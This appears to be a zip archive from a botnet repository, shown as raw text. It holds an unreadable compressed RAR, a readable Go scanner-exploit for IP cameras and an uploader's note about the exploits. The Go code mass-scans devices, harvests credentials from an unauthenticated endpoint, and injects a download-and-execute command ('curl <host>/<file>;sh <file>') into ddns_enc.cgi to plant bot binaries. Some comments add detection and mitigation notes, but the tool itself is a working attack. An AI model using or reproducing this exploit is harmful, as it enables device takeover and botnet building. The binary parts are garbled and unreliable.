R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/0days_skida.zip
PK,!Q�#0days skida/OemExploit.rarup2��0days skida/OemExploit.rarRar!�������ϼo-��)  (�OemExploit/oem.go

ŕr��ʔ0�D336�Xu��x>�E�"����B9Ci�#F؉K�iEjl�Q&���$~��|�ބJm�h�_
M��s������x����7�0���>O�%߆?����<�MBP^��48�TIn<��F�͟J���1���&
�F��p�A$|�jɼ���87������������A�^ݦg����yn�݇ow�D���>��x~�+F"�څ`x�����Xr��L�tP��ym0��y�g@�(1������{���������X�>�+F��>r�<���8��G�O�Y!�&P�nDd���~1��r�{�(�S�t9��~�&cׄG�Y� &�$"�|���.P�<�"��1or06��d:�c�%
�
hV�C��Y.e��h���O�<��*�4}�Fx�@����r��@�@rm���ߝ����ސ#�U"q	Տ�T�������H��T}���z��8��A>n��(�g����jDU踬�$!�i��U�� ��
51��8��<����]�q��[z�0O�
r�h�F�2U��B��G4���S�'^�S�H�W-+�LB�E˄��x~��T9^ =?����}7�,]\#k_��q���g`z�^i_�̐�\���e`(��B�����脶��<���A
��t�J ~1k�2�WG@pɔ��o��lRH0fN��ʝ��$��շ
�����I�!����H�YHMҧ/��"��`g��A{�1�f�Փ�m3��$��I~��'�s4J��x�|n���.����u��z%�~����7�dS!ådH��;D�+�؜����Y��&�LeGV�����������B�r�O�A\_�����w���Y��3bLSG/�3��7�wcgζ
{{+���ۛ��|�����������s_g��L��t�8����^鱩�S4Iy�|Eֈ<��L/���A��q"��#�dqq��	�������Nj���
�
ލ��F���|¤���u�2��)*���4v������(x�4��=U���(K���Δ��
X9>2&�NPq��=�!�1Q�9;�ޜ��+;���=�c*����H�]e�Մ�J�="F��{H�Aj���\d �Յ�M�{��O�|�	�9쒚�;�"����-Q	��ؘ�����IuI�s�e���]j��lP�^Ψ�K��h��K^���O�0��Iŕ!��t�7\�Nb�BեU����m��k�e�Zp�=������/F��Żh��j�KVJ���e;Ub	`�ҩ�Uس�m��]��<
�c@��Ϥ��ϵ����)�"���}���Q��t<hg�K,��������=V�s-�,��<�?%����}+�j�WJ
!�	W�ךU�����l�\��'x�_�Q�<�t���ʟ�hL0a�Ͻ5��C�V��U��ˍ����d'�ӕj�:zU3-
�Blg�eX��������ys<��j�HYF_cFN���C-|�@[K�;!_�W�^u߽Dt��f�tv���
��݈�p��QŽK}X��-�o�}��
h��u��N�8�����`B�s.�^�Xʜ���q�}W�'�RVv\���2�Q�1�k���ov���]�3�\8Z���q
�������z�+[ɳ�<�Uݑ��	\�z�Upyn���ѷOU����cB�����6�oc�����|zu�E������P"����n�� ���j<m#��4���\�x,�/)G�:NL��#׏
��^�&�#�9$��ϔ���/c/�^	�˯@��z(�<�+��@�
����[�}��4���<m�R0����cS�=���-��o������y�Y���~Cp�UF��e�'Y��T����{�maf�����^�0�˽(�r4E���~QW֑�g\����·u^F�hZʀP�,tt�3��Z>o���f��­�S+��V�#�W-�u���Esw=4d�2h�m����ut�J�}٪�l��|*NU�b����7 �d}"\W����,ܯ�R�X�޴]�:71l��|��P	]�Sj&.淪�1^% B6k�2�� ���OemExploit/oemshell.go
�̐*���*�6433�Pd�%Œ@[S����Ib��;E�(��h@"k��
x����\�1��u$� n��t��'_ ��wIӺt�F~H �Ħq܎c|�q.�#�Y�&WY�#����1#���g*)�H�@�pN���#<R��Vܺ��wj6���a\hi�k����� PؕH�r�t����)�J�]�I�F�21XS��:��uviMxE�}�UF���wnK���
cy�����xܙb�J��ZD��rAU�S���c��X|��U�}C/\��6�ϋ��u EH�,�G���G�p�;���Nc�<���V6O�;�3E0�_��Q��K��;��e�B|j��MY`�R[�b*�&�,�$nd��O?/1�TF9���Y����_is	�W����%3Ð����犝�T�{=S��ߏ�`+�a��s��Ƒ;ah��-��UJM!���,���""-G���L�����(U_��6���5�U<����|��0�����Uɶ���X/aE�)g�(�d�i l����$���m7�����z��x$O%�p�	2y*�H�z<���.�K�0f�Mtn���~&����:�u�{�P�1aHuA��X���B��K���]�nDA����>����d�?��� ���O�3<���/�����c~`y��THj󮊊Y��̃k^U��]y�wshb�I��~��LEg��$�
OemExploit
�����wVQPKvJ/��PK��"Qb0days skida/ipcam.goup���0days skida/ipcam.gopackage main

import (
    "net"
    "time"
    "bufio"
    "fmt"
    "os"
    "sync"
	"unicode"
    "strings"
	"encoding/base64"
)

// Progress counters printed once per second by main. processTarget increments
// them from many goroutines with no mutex or atomic, so the figures shown are
// approximate.
var statusAttempted, statusLogins, statusFound, statusVuln, statusClean int

// Timeouts are bare second counts: every use site multiplies the value by
// time.Second (see setReadTimeout/setWriteTimeout and the DialTimeout calls).
var CONNECT_TIMEOUT time.Duration = 30
var READ_TIMEOUT time.Duration = 15
var READ_2_TIMEOUT time.Duration = 5

var WRITE_TIMEOUT time.Duration = 10

// One Add per target is issued in main and one Done per processTarget exit.
var syncWait sync.WaitGroup 

// Command string that processTarget places between ';' separators in the
// account= query parameter. As published it is an unfilled template (host and
// file name are placeholders). URL-decoded (%20 space, %2F slash, %3B
// semicolon) it has the shape "curl <host>/<file>;sh <file>", i.e. download
// then execute.
// Defender note: an embedded camera spawning curl followed by sh, or an
// account= value containing ';' or "%3B" in web logs, is the indicator to
// alert on.
var payload string = "curl%20 PUT YOUR IP HERE WITHOUT SPACES%2FBINS NAME HERE WITHOUT SPACES%3Bsh%20 BINS NAME HERE WITHOUT SPACES"

// zeroByte overwrites every element of a with 0x00, in place.
func zeroByte(a []byte) {
	for idx := range a {
		a[idx] = 0
	}
}

// stipByte replaces each CR (0x0D) and LF (0x0A) byte in a with 0x00, in
// place. The slice keeps its length; all other bytes are left untouched.
func stipByte(a []byte) {
	for idx, b := range a {
		switch b {
		case '\r', '\n':
			a[idx] = 0x00
		}
	}
}


// setWriteTimeout sets conn's write deadline to now plus timeout seconds.
// timeout is a bare count: it is multiplied by time.Second here. Any error
// from SetWriteDeadline is discarded.
func setWriteTimeout(conn net.Conn, timeout time.Duration) {
	deadline := time.Now().Add(timeout * time.Second)
	conn.SetWriteDeadline(deadline)
}

// setReadTimeout sets conn's read deadline to now plus timeout seconds.
// timeout is a bare count: it is multiplied by time.Second here. Any error
// from SetReadDeadline is discarded.
func setReadTimeout(conn net.Conn, timeout time.Duration) {
	deadline := time.Now().Add(timeout * time.Second)
	conn.SetReadDeadline(deadline)
}

// getStringInBetween returns the text of str that lies after the first
// occurrence of start and before the first occurrence of end.
//
// It returns "" when start does not occur in str. It returns the literal
// string "null" when end is missing, when end's first occurrence is not more
// than one byte past the end of start (so empty and one-byte values are
// rejected), or when the computed begin offset is zero.
func getStringInBetween(str string, start string, end string) (result string) {
	begin := strings.Index(str, start)
	if begin < 0 {
		return ""
	}
	begin += len(start)

	// end is searched from the beginning of str, not from begin.
	stop := strings.Index(str, end)
	if begin <= 0 || stop <= begin+1 {
		return "null"
	}
	return str[begin:stop]
}

// processTarget runs a fixed three-request sequence against one "host:port"
// target and updates the package-level counters. Every exit path calls
// syncWait.Done() once.
//
// Sequence, as visible in the code below:
//  1. GET /config/getuser?index=0 with no Authorization header. The target is
//     counted as "found" only if the first 512 response bytes contain
//     "name=", "pass=" and "priv=".
//  2. GET /cgi-bin/ddns_enc.cgi with enable=1 and an account= value of the
//     form ";<payload>;", authenticated with HTTP Basic using the values
//     parsed from step 1.
//  3. After a 15 second sleep, GET /cgi-bin/ddns_enc.cgi with enable=0 and
//     account=aaaa; the target is counted in statusVuln if that response
//     contains "service=www.dlinkddns.com".
//
// Defender notes (review): each step is a plain HTTP/1.1 request and leaves a
// log line. Useful detections are (a) any external request for
// /config/getuser, (b) a ddns_enc.cgi request whose account= parameter
// contains ';' or "%3B", (c) the enable=1 / enable=0 pair about 15 seconds
// apart from the same source, and (d) the hard-coded Firefox 76 on Ubuntu
// User-Agent. Mitigations are to keep the camera's web interface off
// untrusted networks, apply the vendor's firmware fix where one exists, and
// change credentials on any device whose getuser endpoint answered without
// authentication.
func processTarget(target string) {

    statusAttempted++

    conn, err := net.DialTimeout("tcp", target, CONNECT_TIMEOUT * time.Second)
    if err != nil {
        syncWait.Done()
        return
    }

    // Step 1: unauthenticated request for the user record at index 0.
    // The Write error is not checked.
    setWriteTimeout(conn, WRITE_TIMEOUT)
    conn.Write([]byte("GET /config/getuser?index=0 HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))

    // A single Read into a 512-byte buffer: only what arrives in that one
    // read (headers included) is inspected.
    setReadTimeout(conn, READ_TIMEOUT)
    bytebuf := make([]byte, 512)
    l, err := conn.Read(bytebuf)
    if err != nil || l <= 0 {
        zeroByte(bytebuf)
        conn.Close()
		syncWait.Done()
        return
    }

	// CR/LF bytes become NULs so the substring searches below see one run of bytes.
	stipByte(bytebuf)
	conn.Close()

    // The three field names together are treated as evidence that the
    // endpoint returned a credential record without authentication.
    if strings.Contains(string(bytebuf), "name=") && strings.Contains(string(bytebuf), "pass=") && strings.Contains(string(bytebuf), "priv=") {
        statusFound++
    } else {
        zeroByte(bytebuf)
		syncWait.Done()
        return
    }


	// Values are taken as the text between consecutive field names.
	usernameIn := getStringInBetween(string(bytebuf), "name=", "pass=")
	passwordIn := getStringInBetween(string(bytebuf), "pass=", "priv=")

	// Drop every rune that is not graphic (this removes the NULs written by stipByte).
	username := strings.Map(func(r rune) rune {
		if unicode.IsGraphic(r) {
			return r
		}
		return -1
	}, usernameIn)


	password := strings.Map(func(r rune) rune {
		if unicode.IsGraphic(r) {
			return r
		}
		return -1
	}, passwordIn)

	// The buffer holding the raw response is wiped on both branches.
	if len(username) <= 0 || len(password) <= 0 {
	    zeroByte(bytebuf)
		syncWait.Done()
        return
	} else {
		zeroByte(bytebuf)
		statusLogins++
	}

	// HTTP Basic credential built from the values parsed above.
	b64auth := base64.StdEncoding.EncodeToString([]byte(username + ":" + password))

	conn, err = net.DialTimeout("tcp", target, CONNECT_TIMEOUT * time.Second)
    if err != nil {
        syncWait.Done()
        return
    }

    // Step 2: authenticated request whose account= value is ";<payload>;".
    // NOTE(review): the semicolons only matter if the CGI passes account= to
    // a shell unsanitised; rejecting shell metacharacters in that parameter
    // server-side is the fix, and a ';' / "%3B" in account= is the log
    // signature to match on.
    setWriteTimeout(conn, WRITE_TIMEOUT)
    conn.Write([]byte("GET /cgi-bin/ddns_enc.cgi?enable=1&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account=;" + payload + "; HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Basic " + b64auth + "\r\n\r\n"))

    // The response is read but its content is not examined.
    setReadTimeout(conn, READ_TIMEOUT)
    l, err = conn.Read(bytebuf)
    if err != nil || l <= 0 {
        zeroByte(bytebuf)
        conn.Close()
		syncWait.Done()
        return
    }

	conn.Close()
	time.Sleep(15 * time.Second)

	conn, err = net.DialTimeout("tcp", target, CONNECT_TIMEOUT * time.Second)
    if err != nil {
        syncWait.Done()
        return
    }

    // Step 3: same CGI with enable=0 and a harmless account value, which
    // overwrites the setting written in step 2.
    setWriteTimeout(conn, WRITE_TIMEOUT)
    conn.Write([]byte("GET /cgi-bin/ddns_enc.cgi?enable=0&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account=aaaa HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Basic " + b64auth + "\r\n\r\n"))

    setReadTimeout(conn, READ_TIMEOUT)
    l, err = conn.Read(bytebuf)
    if err != nil || l <= 0 {
        zeroByte(bytebuf)
        conn.Close()
		syncWait.Done()
        return
    }

	// This only shows that the CGI accepted the authenticated request and
	// echoed the servername; nothing here checks what the device did with
	// the step 2 value. main prints this counter as "Payload Sent".
	if strings.Contains(string(bytebuf), "service=www.dlinkddns.com") {
		statusVuln++
	}

	conn.Close()
    syncWait.Done()
    return

}

// main reads targets from standard input, one per line, and starts one
// processTarget goroutine per line. It takes exactly one argument: either a
// port number, which is appended to each line as ":<port>", or the word
// "listen", in which case each line is used unchanged as the target.
//
// A background goroutine prints the counters once per second. The number of
// concurrent goroutines is not limited, and syncWait.Wait() is never called
// in this function; the outer loop does not terminate.
//
// Defender note (review): on the wire this appears as one source opening
// connections to many hosts on a single port, each followed by the request
// sequence documented on processTarget.
func main() {

	var i int = 0

    if (len(os.Args) != 2) {
        fmt.Println("[Scanner] Missing argument (port/listen)")
        return
    }

	// Status line: elapsed seconds, then statusAttempted, statusFound,
	// statusLogins and statusVuln (labelled "Payload Sent").
	go func() {
        i = 0
		for {
			fmt.Printf("%d's | Total %d | Device Found: %d | Authenticated: %d | Payload Sent: %d\r\n", i, statusAttempted, statusFound, statusLogins, statusVuln)
			time.Sleep(1 * time.Second)
			i++
		}
	} ()

    for {
        r := bufio.NewReader(os.Stdin)
        scan := bufio.NewScanner(r)
        for scan.Scan() {
            if os.Args[1] == "listen" {
        		go processTarget(scan.Text())
        	} else {
        		go processTarget(scan.Text() + ":" + os.Args[1])
        	}
            // Add is issued after the goroutine has already been started.
            syncWait.Add(1)
        }
    }
}
PK��1bbPKD	#Q� 0days skida/message.txtupD$�r0days skida/message.txtThis video is about some exploit bullshit thats been going around and also a 0day i was scammed for

[?] INFO ABOUT EXPLOITS [?]

#oem/oemshell# - fake 0day
-This exploit is supposed to affect TVT OEM devices, but the issue was resolved in March of 2018
-only older TVT OEM devices are affected, but this exploit tries to infect anything with the port open
-it also doesn't infect every device it displays; it just says "infected" if the page has 200 anywhere in it
-which would include a site that displayed an error with 200 in it, e.g. nfiuhwqig200fiuhs87
-the method it tries to use to inject commands is also resolved, so you will not be able to infect devices

mmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmm
nnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnn

#ipcam#
-This exploit uses a pretty well-known command-line injection method
-getting the devices in bulk is next to impossible without ranges, which I never got
-cgi-bin/ddns_enc.cgi is the file it abuses to give you access
-I was given this one because oem wasn't a 0day, and it's ass



from - (bleaching)
PK��W�PK,!QvJ/��0days skida/OemExploit.rarPK��"Q��1bb�0days skida/ipcam.goPKD	#Q��W��!0days skida/message.txtPK��&